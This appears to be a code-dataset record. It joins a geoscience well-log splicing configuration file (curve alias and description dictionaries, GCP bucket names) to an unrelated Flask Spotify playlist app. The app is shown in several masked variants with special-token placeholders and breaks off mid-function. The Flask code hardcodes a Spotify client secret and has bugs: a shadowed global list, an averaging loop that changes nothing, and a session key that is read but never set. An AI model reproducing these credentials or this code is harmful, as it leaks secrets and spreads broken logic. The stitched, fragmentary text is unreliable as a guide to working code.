'Density Correction Bad Hole Flag', 'DTC_BHF': 'Sonic Bad Hole Flag',
'GR_BHF': 'Gamma Ray Bad Hole Flag', 'NPHIL_BHF':
'Neutron Bad Hole Flag', 'RHOB_BHF': 'Density Bad Hole Flag',
'LOG_RDEEP_BHF': 'Resistivity Bad Hole Flag', 'PE_BHF':
'PE Bad Hole Flag', 'RHOB_MCF': 'Density Corrected from Multiwell Flag',
'RHOB_SYN': 'Density Estimation from Ensemble of Learners', 'NPHI_MCF':
'Neutron Corrected from Multiwell Flag', 'NPHI_SYN':
'Neutron Estimation from Ensemble of Learners', 'DTC_MCF':
'Sonic Corrected from Multiwell Flag', 'DTC_SYN':
'Sonic Estimation from Ensemble of Learners', 'PE_MCF':
'PE Corrected from Multiwell Flag', 'PE_SYN':
'PE Estimation from Ensemble of Learners', 'RHOB_NCF':
'Density No Correction Flag', 'RHOB_CORR': 'Density Corrected',
'NPHI_NCF': 'Neutron No Correction Flag', 'NPHI_CORR':
'Neutron Corrected', 'DTC_NCF': 'Sonic No Correction Flag', 'DTC_CORR':
'Sonic Corrected', 'PE_NCF': 'PE No Correction Flag', 'PE_CORR':
'PE Corrected'}
<|reserved_special_token_1|>
PROJECT_ID = "aaet-geoscience-dev"
# The tmp folder is for lasio I/O purposes
DATA_PATH = "/home/airflow/gcs/data/tmp"
# Credential JSON key for accessing other projects
# CREDENTIALS_JSON = "gs://aaet_zexuan/flow/keys/composer_las_merge.json"
CREDENTIALS_JSON = "keys/composer_las_merge.json"
# Bucket name for merged las files and spliced las files
BUCKET_LAS_MERGE = "las_merged"
BUCKET_LAS_SPLICE = "us-central1-lithos-dev-94beb3d4-bucket"
# las_splice.py output to the composer data folder, as input of logqc
COMPOSER_FOLDER = "data/logqc_landing"
TMP_FOLDER = "data/tmp"
# for GCP web UI and Big Query Job Status Report
BUCKET_JOB = "log_splice_tool_jobs"
BIGQUERY_DATASET_ID = "urc_jobs"
BIGQUERY_TABLE_ID = "jobs"
# Workflow type
tpt_workflow_type = "tpt"
logsplice_workflow_type = "logsplice"
logqc_workflow_type = "logqc"
geomech_workflow_type = "geomech"
# Number of processors for las_merge_MP (multiprocessing).
N_PROCESSORS = 16
# The window size for moving average, e.g. 11 means the window covers a
# point and 5 adjacent points on both sides
MOVING_AVG_WINDOW_SIZE = 11
# Default value for missing data, usually it is either -999.25 or -999.0
MISSING = -999.0
# COL_DICT: a dictionary of aliased curve names for log splicing. keys correspond to measurements
# (e.g., 'density', 'gamma', 'resistivity', etc.),
# and each value is a list of aliased column names that could potentially correspond
# to those measurements. Each key is the aliased curve name before splicing,
# each key's value is the standard curve name after splicing.
COL_DICT = {
# Caliper
"cal": ["CAL", "CALI", "CALX", "HCAL", "TGS_CALX", "RAW_CALX"],
# Compressional Sonic Slowness
"dtc": ["DT", "DT24", "DTC", 'TGS_DT', "TGS_DTC", "RAW_DT", "RAW_DTC"],
# Deep Resistivity
# 'rdeep' includes 'rdeep_ltrl' (laterolog), 'rdeep_indct' (induction), 'rdeep_unknown'.
# A final 'rdeep' will be generated
# with an additional 'rdeep_type' curve to denote the log type.
"rdeep": ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90', 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'],
# Density (Bulk)
"rhob": ["DEN", "RHOB", "RHOZ", "ZDEN", "ZDNC", "TGS_RHOB", 'RAW_RHOB'],
# Density (Correction)
"drho": ["DRHO", "HDRA", "ZCOR"],
# Gamma Ray
"gr": ["APC_GR_NRM", "GAMM", "GR", "GR_R", "GRR", 'SGR', 'SGRR', 'CGR'],
# Neutron Porosity
"nphil": ["CNCF", "NEU", "NPOR", "NPHI", "NPHIL", "TNPH", 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'],
# Photoelectric effect
"pe": ["PE", "PEF", "PEFZ", 'TGS_PE', 'RAW_PE'],
}
# LDD is laterolog
# The rest are inductions
# RDEEP, RES, RES_DEEP are of unknown origin
# __log_type_rdeep = [log_type_enum.induction, #AHT90
# log_type_enum.induction, #AT90
# log_type_enum.induction, #ILD
# log_type_enum.induction, #ILT90
# log_type_enum.laterolog, #LLD
# log_type_enum.induction, #M2R9
# log_type_enum.unknown, #RDEEP
# log_type_enum.unknown, #RES
# log_type_enum.unknown] #RES_DEEP
RDEEP_TYPE_LIST = ["rdeep_ltrl", "rdeep_indct", "rdeep_unknown"]
RDEEP_TYPE_DICT = {"rdeep_ltrl": 1, "rdeep_indct": 2, "rdeep_unknown": 3}
# curve description dictionary
CURVE_DESC = {
"DEPT": "Depth",
"CAL": "Caliper",
"DRHO": "Density Correction",
"DTC": "Compressional Wave Slowness",
"DTS": "Shear Wave Slowness",
"GR": "Gamma Ray",
"NPHI": "Neutron Porosity",
"NPHIL": "Neutron Porosity",
"PE": "Photoelectric Effect",
"RDEEP": "Deep Resistivity",
"RDEEP_LTRL": "Laterolog Resistivity",
"RDEEP_INDCT": "Induction Resistivity",
"RDEEP_UNKNOWN": "Unknown Resistivity (Laterolog or Induction)",
"RDEEP_TYPE": "RDEEP Type 1:Laterolog 2:Induction 3:Unknown",
"RHOB": "Bulk Density",
"RUGOSITY": "Borehole Rugosity",
"RUGOSITY_BHF": "Rugosity Bad Hole Flag",
"DRHO_BHF": "Density Correction Bad Hole Flag",
"DTC_BHF": "Sonic Bad Hole Flag",
"GR_BHF": "Gamma Ray Bad Hole Flag",
"NPHIL_BHF": "Neutron Bad Hole Flag",
"RHOB_BHF": "Density Bad Hole Flag",
"LOG_RDEEP_BHF": "Resistivity Bad Hole Flag",
"PE_BHF": "PE Bad Hole Flag",
"RHOB_MCF": "Density Corrected from Multiwell Flag",
"RHOB_SYN": "Density Estimation from Ensemble of Learners",
"NPHI_MCF": "Neutron Corrected from Multiwell Flag",
"NPHI_SYN": "Neutron Estimation from Ensemble of Learners",
"DTC_MCF": "Sonic Corrected from Multiwell Flag",
"DTC_SYN": "Sonic Estimation from Ensemble of Learners",
"PE_MCF": "PE Corrected from Multiwell Flag",
"PE_SYN": "PE Estimation from Ensemble of Learners",
"RHOB_NCF": "Density No Correction Flag",
"RHOB_CORR": "Density Corrected",
"NPHI_NCF": "Neutron No Correction Flag",
"NPHI_CORR": "Neutron Corrected",
"DTC_NCF": "Sonic No Correction Flag",
"DTC_CORR": "Sonic Corrected",
"PE_NCF": "PE No Correction Flag",
"PE_CORR": "PE Corrected"
}
|
flexible
|
{
"blob_id": "0b2a036b806cca6e7f58008040b3a261a8bc844d",
"index": 4092,
"step-1": "<mask token>\n",
"step-2": "PROJECT_ID = 'aaet-geoscience-dev'\nDATA_PATH = '/home/airflow/gcs/data/tmp'\nCREDENTIALS_JSON = 'keys/composer_las_merge.json'\nBUCKET_LAS_MERGE = 'las_merged'\nBUCKET_LAS_SPLICE = 'us-central1-lithos-dev-94beb3d4-bucket'\nCOMPOSER_FOLDER = 'data/logqc_landing'\nTMP_FOLDER = 'data/tmp'\nBUCKET_JOB = 'log_splice_tool_jobs'\nBIGQUERY_DATASET_ID = 'urc_jobs'\nBIGQUERY_TABLE_ID = 'jobs'\ntpt_workflow_type = 'tpt'\nlogsplice_workflow_type = 'logsplice'\nlogqc_workflow_type = 'logqc'\ngeomech_workflow_type = 'geomech'\nN_PROCESSORS = 16\nMOVING_AVG_WINDOW_SIZE = 11\nMISSING = -999.0\nCOL_DICT = {'cal': ['CAL', 'CALI', 'CALX', 'HCAL', 'TGS_CALX', 'RAW_CALX'],\n 'dtc': ['DT', 'DT24', 'DTC', 'TGS_DT', 'TGS_DTC', 'RAW_DT', 'RAW_DTC'],\n 'rdeep': ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90',\n 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'], 'rhob': ['DEN',\n 'RHOB', 'RHOZ', 'ZDEN', 'ZDNC', 'TGS_RHOB', 'RAW_RHOB'], 'drho': [\n 'DRHO', 'HDRA', 'ZCOR'], 'gr': ['APC_GR_NRM', 'GAMM', 'GR', 'GR_R',\n 'GRR', 'SGR', 'SGRR', 'CGR'], 'nphil': ['CNCF', 'NEU', 'NPOR', 'NPHI',\n 'NPHIL', 'TNPH', 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'], 'pe': [\n 'PE', 'PEF', 'PEFZ', 'TGS_PE', 'RAW_PE']}\nRDEEP_TYPE_LIST = ['rdeep_ltrl', 'rdeep_indct', 'rdeep_unknown']\nRDEEP_TYPE_DICT = {'rdeep_ltrl': 1, 'rdeep_indct': 2, 'rdeep_unknown': 3}\nCURVE_DESC = {'DEPT': 'Depth', 'CAL': 'Caliper', 'DRHO':\n 'Density Correction', 'DTC': 'Compressional Wave Slowness', 'DTS':\n 'Shear Wave Slowness', 'GR': 'Gamma Ray', 'NPHI': 'Neutron Porosity',\n 'NPHIL': 'Neutron Porosity', 'PE': 'Photoelectric Effect', 'RDEEP':\n 'Deep Resistivity', 'RDEEP_LTRL': 'Laterolog Resistivity',\n 'RDEEP_INDCT': 'Induction Resistivity', 'RDEEP_UNKNOWN':\n 'Unknown Resistivity (Laterolog or Induction)', 'RDEEP_TYPE':\n 'RDEEP Type 1:Laterolog 2:Induction 3:Unknown', 'RHOB': 'Bulk Density',\n 'RUGOSITY': 'Borehole Rugosity', 'RUGOSITY_BHF':\n 'Rugosity Bad Hole Flag', 'DRHO_BHF':\n 'Density Correction Bad Hole Flag', 'DTC_BHF': 'Sonic Bad Hole Flag',\n 'GR_BHF': 'Gamma Ray Bad Hole Flag', 'NPHIL_BHF':\n 'Neutron Bad Hole Flag', 'RHOB_BHF': 'Density Bad Hole Flag',\n 'LOG_RDEEP_BHF': 'Resistivity Bad Hole Flag', 'PE_BHF':\n 'PE Bad Hole Flag', 'RHOB_MCF': 'Density Corrected from Multiwell Flag',\n 'RHOB_SYN': 'Density Estimation from Ensemble of Learners', 'NPHI_MCF':\n 'Neutron Corrected from Multiwell Flag', 'NPHI_SYN':\n 'Neutron Estimation from Ensemble of Learners', 'DTC_MCF':\n 'Sonic Corrected from Multiwell Flag', 'DTC_SYN':\n 'Sonic Estimation from Ensemble of Learners', 'PE_MCF':\n 'PE Corrected from Multiwell Flag', 'PE_SYN':\n 'PE Estimation from Ensemble of Learners', 'RHOB_NCF':\n 'Density No Correction Flag', 'RHOB_CORR': 'Density Corrected',\n 'NPHI_NCF': 'Neutron No Correction Flag', 'NPHI_CORR':\n 'Neutron Corrected', 'DTC_NCF': 'Sonic No Correction Flag', 'DTC_CORR':\n 'Sonic Corrected', 'PE_NCF': 'PE No Correction Flag', 'PE_CORR':\n 'PE Corrected'}\n",
"step-3": "PROJECT_ID = \"aaet-geoscience-dev\"\r\n# The tmp folder is for lasio I/O purposes\r\nDATA_PATH = \"/home/airflow/gcs/data/tmp\"\r\n\r\n# Credential JSON key for accessing other projects\r\n# CREDENTIALS_JSON = \"gs://aaet_zexuan/flow/keys/composer_las_merge.json\"\r\nCREDENTIALS_JSON = \"keys/composer_las_merge.json\"\r\n\r\n# Bucket name for merged las files and spliced las files\r\nBUCKET_LAS_MERGE = \"las_merged\"\r\nBUCKET_LAS_SPLICE = \"us-central1-lithos-dev-94beb3d4-bucket\"\r\n\r\n# las_splice.py output to the composer data folder, as input of logqc\r\nCOMPOSER_FOLDER = \"data/logqc_landing\"\r\nTMP_FOLDER = \"data/tmp\"\r\n# for GCP web UI and Big Query Job Status Report\r\nBUCKET_JOB = \"log_splice_tool_jobs\"\r\nBIGQUERY_DATASET_ID = \"urc_jobs\"\r\nBIGQUERY_TABLE_ID = \"jobs\"\r\n\r\n# Workflow type\r\ntpt_workflow_type = \"tpt\"\r\nlogsplice_workflow_type = \"logsplice\"\r\nlogqc_workflow_type = \"logqc\"\r\ngeomech_workflow_type = \"geomech\"\r\n\r\n# Number of processors for las_merge_MP (multiprocessing).\r\nN_PROCESSORS = 16\r\n\r\n# The window size for moving average, e.g. 11 means the window covers a\r\n# point and 5 adjacent points on both sides\r\nMOVING_AVG_WINDOW_SIZE = 11\r\n\r\n# Default value for missing data, usually it is either -999.25 or -999.0\r\nMISSING = -999.0\r\n\r\n# COL_DICT: a dictionary of aliased curve names for log splicing. keys correspond to measurements\r\n# (e.g., 'density', 'gamma', 'resistivity', etc.),\r\n# and each value is a list of aliased column names that could potentially correspond\r\n# to those measurements. Each key is the aliased curve name before splicing,\r\n# each key's value is the standard curve name after splicing.\r\nCOL_DICT = {\r\n # Caliper\r\n \"cal\": [\"CAL\", \"CALI\", \"CALX\", \"HCAL\", \"TGS_CALX\", \"RAW_CALX\"],\r\n # Compressional Sonic Slowness\r\n \"dtc\": [\"DT\", \"DT24\", \"DTC\", 'TGS_DT', \"TGS_DTC\", \"RAW_DT\", \"RAW_DTC\"],\r\n # Deep Resistivity\r\n # 'rdeep' includes 'rdeep_ltrl' (laterolog), 'rdeep_indct' (induction), 'rdeep_unknown'.\r\n # A final 'rdeep' will be generated\r\n # with an additional 'rdeep_type' curve to denote the log type.\r\n \"rdeep\": ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90', 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'],\r\n # Density (Bulk)\r\n \"rhob\": [\"DEN\", \"RHOB\", \"RHOZ\", \"ZDEN\", \"ZDNC\", \"TGS_RHOB\", 'RAW_RHOB'],\r\n # Density (Correction)\r\n \"drho\": [\"DRHO\", \"HDRA\", \"ZCOR\"],\r\n # Gamma Ray\r\n \"gr\": [\"APC_GR_NRM\", \"GAMM\", \"GR\", \"GR_R\", \"GRR\", 'SGR', 'SGRR', 'CGR'],\r\n # Neutron Porosity\r\n \"nphil\": [\"CNCF\", \"NEU\", \"NPOR\", \"NPHI\", \"NPHIL\", \"TNPH\", 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'],\r\n # Photoelectric effect\r\n \"pe\": [\"PE\", \"PEF\", \"PEFZ\", 'TGS_PE', 'RAW_PE'],\r\n}\r\n\r\n# LDD is laterolog\r\n# The rest are inductions\r\n# RDEEP, RES, RES_DEEP are of unknown origin\r\n# __log_type_rdeep = [log_type_enum.induction, #AHT90\r\n# log_type_enum.induction, #AT90\r\n# log_type_enum.induction, #ILD\r\n# log_type_enum.induction, #ILT90\r\n# log_type_enum.laterolog, #LLD\r\n# log_type_enum.induction, #M2R9\r\n# log_type_enum.unknown, #RDEEP\r\n# log_type_enum.unknown, #RES\r\n# log_type_enum.unknown] #RES_DEEP\r\n\r\nRDEEP_TYPE_LIST = [\"rdeep_ltrl\", \"rdeep_indct\", \"rdeep_unknown\"]\r\nRDEEP_TYPE_DICT = {\"rdeep_ltrl\": 1, \"rdeep_indct\": 2, \"rdeep_unknown\": 3}\r\n\r\n# curve description dictionary\r\nCURVE_DESC = {\r\n \"DEPT\": \"Depth\",\r\n \"CAL\": \"Caliper\",\r\n \"DRHO\": \"Density Correction\",\r\n \"DTC\": \"Compressional Wave Slowness\",\r\n \"DTS\": \"Shear Wave Slowness\",\r\n \"GR\": \"Gamma Ray\",\r\n \"NPHI\": \"Neutron Porosity\",\r\n \"NPHIL\": \"Neutron Porosity\",\r\n \"PE\": \"Photoelectric Effect\",\r\n \"RDEEP\": \"Deep Resistivity\",\r\n \"RDEEP_LTRL\": \"Laterolog Resistivity\",\r\n \"RDEEP_INDCT\": \"Induction Resistivity\",\r\n \"RDEEP_UNKNOWN\": \"Unknown Resistivity (Laterolog or Induction)\",\r\n \"RDEEP_TYPE\": \"RDEEP Type 1:Laterolog 2:Induction 3:Unknown\",\r\n \"RHOB\": \"Bulk Density\",\r\n \"RUGOSITY\": \"Borehole Rugosity\",\r\n \"RUGOSITY_BHF\": \"Rugosity Bad Hole Flag\",\r\n \"DRHO_BHF\": \"Density Correction Bad Hole Flag\",\r\n \"DTC_BHF\": \"Sonic Bad Hole Flag\",\r\n \"GR_BHF\": \"Gamma Ray Bad Hole Flag\",\r\n \"NPHIL_BHF\": \"Neutron Bad Hole Flag\",\r\n \"RHOB_BHF\": \"Density Bad Hole Flag\",\r\n \"LOG_RDEEP_BHF\": \"Resistivity Bad Hole Flag\",\r\n \"PE_BHF\": \"PE Bad Hole Flag\",\r\n \"RHOB_MCF\": \"Density Corrected from Multiwell Flag\",\r\n \"RHOB_SYN\": \"Density Estimation from Ensemble of Learners\",\r\n \"NPHI_MCF\": \"Neutron Corrected from Multiwell Flag\",\r\n \"NPHI_SYN\": \"Neutron Estimation from Ensemble of Learners\",\r\n \"DTC_MCF\": \"Sonic Corrected from Multiwell Flag\",\r\n \"DTC_SYN\": \"Sonic Estimation from Ensemble of Learners\",\r\n \"PE_MCF\": \"PE Corrected from Multiwell Flag\",\r\n \"PE_SYN\": \"PE Estimation from Ensemble of Learners\",\r\n \"RHOB_NCF\": \"Density No Correction Flag\",\r\n \"RHOB_CORR\": \"Density Corrected\",\r\n \"NPHI_NCF\": \"Neutron No Correction Flag\",\r\n \"NPHI_CORR\": \"Neutron Corrected\",\r\n \"DTC_NCF\": \"Sonic No Correction Flag\",\r\n \"DTC_CORR\": \"Sonic Corrected\",\r\n \"PE_NCF\": \"PE No Correction Flag\",\r\n \"PE_CORR\": \"PE Corrected\"\r\n}\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
@app.route('/tracks', methods=['POST'])
def get_user_tracks():
ids = json.loads(request.data)['ids']
tracks.extend(ids)
return 'success'
@app.route('/')
@login_required
def index():
username = session['username']
if session.get('token') and session.get('playlist_dict'):
group_playlist = gen_playlist(tracks)
sp = spotipy.Spotify(auth=session['token'])
playlist = sp.user_playlist_add_tracks(username, session[
'playlist_dict']['id'], group_playlist)
return render_template('index.html', playlist_url=session[
'playlist_dict']['uri'])
token = util.prompt_for_user_token(username,
'playlist-modify-public user-top-read', client_id=client_id,
client_secret=client_secret, redirect_uri='http://127.0.0.1')
if token:
session['token'] = token
sp = spotipy.Spotify(auth=token)
track_dict = sp.current_user_top_tracks(limit=20, offset=0,
time_range='medium_term')
tracks = list(map(lambda x: x['id'], track_dict['items']))
group_playlist = gen_playlist(tracks)
playlist_dict = sp.user_playlist_create(username, 'Group Playlist')
playlist_id = playlist_dict['id']
user = playlist_dict['owner']
playlist = sp.user_playlist_add_tracks(username, playlist_id,
group_playlist)
else:
print("Can't get token for " + username)
url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']
session['playlist_url'] = playlist_dict['uri']
return render_template('index.html', playlist_url=url)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
tracks = []
if request.method == 'POST':
if request.form.get('username'):
session['username'] = request.form.get('username')
return redirect('/')
else:
return render_template('login.html')
<|reserved_special_token_0|>
def gen_playlist(track_ids):
client_credentials_manager = SpotifyClientCredentials(client_id,
client_secret)
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,
'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness':
0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,
'tempo': 0.0}
song_counter = 0.0
for song in track_ids:
song_counter += 1
features = sp.audio_features(tracks=[song])
for key, value in features[0].items():
if isinstance(value, float):
total_features[key] += value
if song_counter > 0:
for key, value in total_features.items():
value /= song_counter
song_list = []
for song in track_ids:
score = compare_score(song, total_features, sp.audio_features(
tracks=[song]))
song_list.append((song, score))
song_list = sorted(song_list, key=lambda x: x[1])
if len(song_list) > 20:
song_list = song_list[:20]
song_list = [song_list[i][0] for i in range(len(song_list))]
return song_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if app.config['DEBUG']:
@app.after_request
def after_request(response):
response.headers['Cache-Control'
] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_0|>
Session(app)
<|reserved_special_token_0|>
@app.route('/tracks', methods=['POST'])
def get_user_tracks():
ids = json.loads(request.data)['ids']
tracks.extend(ids)
return 'success'
@app.route('/')
@login_required
def index():
username = session['username']
if session.get('token') and session.get('playlist_dict'):
group_playlist = gen_playlist(tracks)
sp = spotipy.Spotify(auth=session['token'])
playlist = sp.user_playlist_add_tracks(username, session[
'playlist_dict']['id'], group_playlist)
return render_template('index.html', playlist_url=session[
'playlist_dict']['uri'])
token = util.prompt_for_user_token(username,
'playlist-modify-public user-top-read', client_id=client_id,
client_secret=client_secret, redirect_uri='http://127.0.0.1')
if token:
session['token'] = token
sp = spotipy.Spotify(auth=token)
track_dict = sp.current_user_top_tracks(limit=20, offset=0,
time_range='medium_term')
tracks = list(map(lambda x: x['id'], track_dict['items']))
group_playlist = gen_playlist(tracks)
playlist_dict = sp.user_playlist_create(username, 'Group Playlist')
playlist_id = playlist_dict['id']
user = playlist_dict['owner']
playlist = sp.user_playlist_add_tracks(username, playlist_id,
group_playlist)
else:
print("Can't get token for " + username)
url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']
session['playlist_url'] = playlist_dict['uri']
return render_template('index.html', playlist_url=url)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
tracks = []
if request.method == 'POST':
if request.form.get('username'):
session['username'] = request.form.get('username')
return redirect('/')
else:
return render_template('login.html')
def compare_score(song, total_features, features):
score = 0.0
for key, value in features[0].items():
if isinstance(value, float):
score += value * 1.0 / (1.0 * (total_features[key] + value))
return score
def gen_playlist(track_ids):
client_credentials_manager = SpotifyClientCredentials(client_id,
client_secret)
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,
'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness':
0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,
'tempo': 0.0}
song_counter = 0.0
for song in track_ids:
song_counter += 1
features = sp.audio_features(tracks=[song])
for key, value in features[0].items():
if isinstance(value, float):
total_features[key] += value
if song_counter > 0:
for key, value in total_features.items():
value /= song_counter
song_list = []
for song in track_ids:
score = compare_score(song, total_features, sp.audio_features(
tracks=[song]))
song_list.append((song, score))
song_list = sorted(song_list, key=lambda x: x[1])
if len(song_list) > 20:
song_list = song_list[:20]
song_list = [song_list[i][0] for i in range(len(song_list))]
return song_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
client_id = '320606726d354474b5da64233babe82d'
client_secret = 'f2d15a0b056343cfa094525adfc45f27'
if app.config['DEBUG']:
@app.after_request
def after_request(response):
response.headers['Cache-Control'
] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
app.config['SESSION_FILE_DIR'] = mkdtemp()
app.config['SESSION_PERMANENT'] = False
app.config['SESSION_TYPE'] = 'filesystem'
Session(app)
tracks = []
@app.route('/tracks', methods=['POST'])
def get_user_tracks():
ids = json.loads(request.data)['ids']
tracks.extend(ids)
return 'success'
@app.route('/')
@login_required
def index():
username = session['username']
if session.get('token') and session.get('playlist_dict'):
group_playlist = gen_playlist(tracks)
sp = spotipy.Spotify(auth=session['token'])
playlist = sp.user_playlist_add_tracks(username, session[
'playlist_dict']['id'], group_playlist)
return render_template('index.html', playlist_url=session[
'playlist_dict']['uri'])
token = util.prompt_for_user_token(username,
'playlist-modify-public user-top-read', client_id=client_id,
client_secret=client_secret, redirect_uri='http://127.0.0.1')
if token:
session['token'] = token
sp = spotipy.Spotify(auth=token)
track_dict = sp.current_user_top_tracks(limit=20, offset=0,
time_range='medium_term')
tracks = list(map(lambda x: x['id'], track_dict['items']))
group_playlist = gen_playlist(tracks)
playlist_dict = sp.user_playlist_create(username, 'Group Playlist')
playlist_id = playlist_dict['id']
user = playlist_dict['owner']
playlist = sp.user_playlist_add_tracks(username, playlist_id,
group_playlist)
else:
print("Can't get token for " + username)
url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']
session['playlist_url'] = playlist_dict['uri']
return render_template('index.html', playlist_url=url)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
tracks = []
if request.method == 'POST':
if request.form.get('username'):
session['username'] = request.form.get('username')
return redirect('/')
else:
return render_template('login.html')
def compare_score(song, total_features, features):
score = 0.0
for key, value in features[0].items():
if isinstance(value, float):
score += value * 1.0 / (1.0 * (total_features[key] + value))
return score
def gen_playlist(track_ids):
client_credentials_manager = SpotifyClientCredentials(client_id,
client_secret)
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,
'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness':
0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,
'tempo': 0.0}
song_counter = 0.0
for song in track_ids:
song_counter += 1
features = sp.audio_features(tracks=[song])
for key, value in features[0].items():
if isinstance(value, float):
total_features[key] += value
if song_counter > 0:
for key, value in total_features.items():
value /= song_counter
song_list = []
for song in track_ids:
score = compare_score(song, total_features, sp.audio_features(
tracks=[song]))
song_list.append((song, score))
song_list = sorted(song_list, key=lambda x: x[1])
if len(song_list) > 20:
song_list = song_list[:20]
song_list = [song_list[i][0] for i in range(len(song_list))]
return song_list
<|reserved_special_token_1|>
import json
import spotipy
import spotipy.util as util
from spotipy.oauth2 import SpotifyClientCredentials
from flask import abort, Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from helpers import login_required
app = Flask(__name__)
client_id = '320606726d354474b5da64233babe82d'
client_secret = 'f2d15a0b056343cfa094525adfc45f27'
if app.config['DEBUG']:
@app.after_request
def after_request(response):
response.headers['Cache-Control'
] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
app.config['SESSION_FILE_DIR'] = mkdtemp()
app.config['SESSION_PERMANENT'] = False
app.config['SESSION_TYPE'] = 'filesystem'
Session(app)
tracks = []
@app.route('/tracks', methods=['POST'])
def get_user_tracks():
ids = json.loads(request.data)['ids']
tracks.extend(ids)
return 'success'
@app.route('/')
@login_required
def index():
username = session['username']
if session.get('token') and session.get('playlist_dict'):
group_playlist = gen_playlist(tracks)
sp = spotipy.Spotify(auth=session['token'])
playlist = sp.user_playlist_add_tracks(username, session[
'playlist_dict']['id'], group_playlist)
return render_template('index.html', playlist_url=session[
'playlist_dict']['uri'])
token = util.prompt_for_user_token(username,
'playlist-modify-public user-top-read', client_id=client_id,
client_secret=client_secret, redirect_uri='http://127.0.0.1')
if token:
session['token'] = token
sp = spotipy.Spotify(auth=token)
track_dict = sp.current_user_top_tracks(limit=20, offset=0,
time_range='medium_term')
tracks = list(map(lambda x: x['id'], track_dict['items']))
group_playlist = gen_playlist(tracks)
playlist_dict = sp.user_playlist_create(username, 'Group Playlist')
playlist_id = playlist_dict['id']
user = playlist_dict['owner']
playlist = sp.user_playlist_add_tracks(username, playlist_id,
group_playlist)
else:
print("Can't get token for " + username)
url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']
session['playlist_url'] = playlist_dict['uri']
return render_template('index.html', playlist_url=url)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
tracks = []
if request.method == 'POST':
if request.form.get('username'):
session['username'] = request.form.get('username')
return redirect('/')
else:
return render_template('login.html')
def compare_score(song, total_features, features):
score = 0.0
for key, value in features[0].items():
if isinstance(value, float):
score += value * 1.0 / (1.0 * (total_features[key] + value))
return score
def gen_playlist(track_ids):
client_credentials_manager = SpotifyClientCredentials(client_id,
client_secret)
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,
'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness':
0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,
'tempo': 0.0}
song_counter = 0.0
for song in track_ids:
song_counter += 1
features = sp.audio_features(tracks=[song])
for key, value in features[0].items():
if isinstance(value, float):
total_features[key] += value
if song_counter > 0:
for key, value in total_features.items():
value /= song_counter
song_list = []
for song in track_ids:
score = compare_score(song, total_features, sp.audio_features(
tracks=[song]))
song_list.append((song, score))
song_list = sorted(song_list, key=lambda x: x[1])
if len(song_list) > 20:
song_list = song_list[:20]
song_list = [song_list[i][0] for i in range(len(song_list))]
return song_list
<|reserved_special_token_1|>
import json
import spotipy
import spotipy.util as util
from spotipy.oauth2 import SpotifyClientCredentials
from flask import abort, Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from helpers import login_required
# Configure application
app = Flask(__name__)
client_id = '320606726d354474b5da64233babe82d'
client_secret = 'f2d15a0b056343cfa094525adfc45f27'
# Ensure responses aren't cached
if app.config["DEBUG"]:
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# list of track ids gathered from users
tracks = []
# retrieve top tracks from newly connected user
@app.route("/tracks", methods = ["POST"])
def get_user_tracks():
ids = json.loads(request.data)['ids']
tracks.extend(ids)
return 'success'
# Main page. Runs playlist generation and displays the embedded playlist.
@app.route("/")
@login_required
def index():
username = session["username"]
# host has already logged in and playlist is already made
if session.get("token") and session.get("playlist_dict"):
group_playlist = gen_playlist(tracks)
